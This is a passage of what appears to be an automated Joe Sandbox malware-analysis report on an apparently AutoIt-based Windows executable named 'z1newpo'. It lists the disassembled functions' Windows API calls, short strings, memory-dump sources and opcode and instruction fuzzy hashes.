                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                    • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                    APIs
                                                    • SendMessageW.USER32 ref: 00448C69
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                    APIs
                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                    • String ID:
                                                    • API String ID: 1358664141-0
                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                    • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                    • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                    • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0043392E
                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                    • __wsplitpath.LIBCMT ref: 00433950
                                                    • __wcsicoll.LIBCMT ref: 00433974
                                                    • __wcsicoll.LIBCMT ref: 0043398A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                    • String ID:
                                                    • API String ID: 1187119602-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1597257046-0
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                    • __malloc_crt.LIBCMT ref: 0041F5B6
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                    • String ID:
                                                    • API String ID: 237123855-0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 3349847261-0
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                    • String ID:
                                                    • API String ID: 2223660684-0
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                    • LineTo.GDI32(?,?,?), ref: 00447326
                                                    • EndPath.GDI32(?), ref: 00447336
                                                    • StrokePath.GDI32(?), ref: 00447344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 2783949968-0
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                    • __freeptd.LIBCMT ref: 0041516B
                                                    • ExitThread.KERNEL32 ref: 00415173
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1454798553-0
                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _strncmp
                                                    • String ID: Q\E
                                                    • API String ID: 909875538-2189900498
                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                    APIs
                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 2652923123-3941886329
                                                    • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                    • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: U$\
                                                    • API String ID: 2666721431-100911408
                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                    • String ID: LPT
                                                    • API String ID: 3035604524-1350329615
                                                    • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                    • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$h
                                                    • API String ID: 4104443479-677774858
                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
